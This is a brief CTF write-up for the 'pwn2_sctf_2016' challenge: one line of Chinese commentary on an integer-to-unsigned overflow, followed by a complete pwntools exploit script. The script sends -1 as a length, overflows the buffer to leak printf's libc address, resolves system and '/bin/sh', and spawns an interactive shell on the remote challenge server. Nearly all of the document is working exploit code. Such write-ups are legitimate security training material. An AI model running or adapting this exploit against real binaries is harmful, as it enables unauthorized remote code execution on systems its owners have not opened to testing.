pwn2_sctf_2016
查看保护
这里的int给转换成了无符号的,输入-1的时候,值会变得很大,整型溢出。ret2libc即可
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25828)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
r.recvuntil('ow many bytes do you want me to read? ')
r.sendline('-1')
printf_plt = elf.plt['printf']
main_addr = elf.sym['main']
printf_got = elf.got['printf']
p1 = b'a' * (0x2c + 4) + p32(printf_plt) + p32(main_addr) + p32(printf_got)
r.sendline(p1)
r.recvuntil('\n')
r.recvuntil('\n')
printf_addr = u32(r.recv(4))
libc = ELF('./libc-2.23.so')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
p2 = b'a' * (0x2c + 4) + p32(system_addr) + p32(main_addr) + p32(bin_sh)
r.sendline(p2)
r.interactive()